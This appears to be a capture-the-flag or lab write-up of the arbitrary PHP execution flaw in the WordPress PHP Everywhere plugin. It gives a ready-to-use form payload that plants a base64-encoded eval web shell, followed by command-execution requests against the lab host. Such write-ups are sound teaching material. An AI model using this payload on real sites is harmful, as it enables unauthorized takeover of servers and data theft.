Product Introduction#
WordPress is a personal blog system that has gradually evolved into a content management system software. It is developed using PHP language and MySQL database. Users can use their own blogs on servers that support PHP and MySQL databases.
Vulnerability Overview#
Any subscriber can exploit this vulnerability by sending a request with the "shortcode" parameter set to PHP Everywhere and execute arbitrary PHP code on the site.
Scope of Impact#
<= 2.0.3
Affected Plugin: PHP Everywhere
Exploitation Process#
Access the backend address:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
Account: test/test
Delete the content below the dashboard, press F12 in the browser, add a node, and enter the following content:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Then execute it (click execute) and access the following link:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
The page returns 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
Fix Suggestions#
- Upgrade the version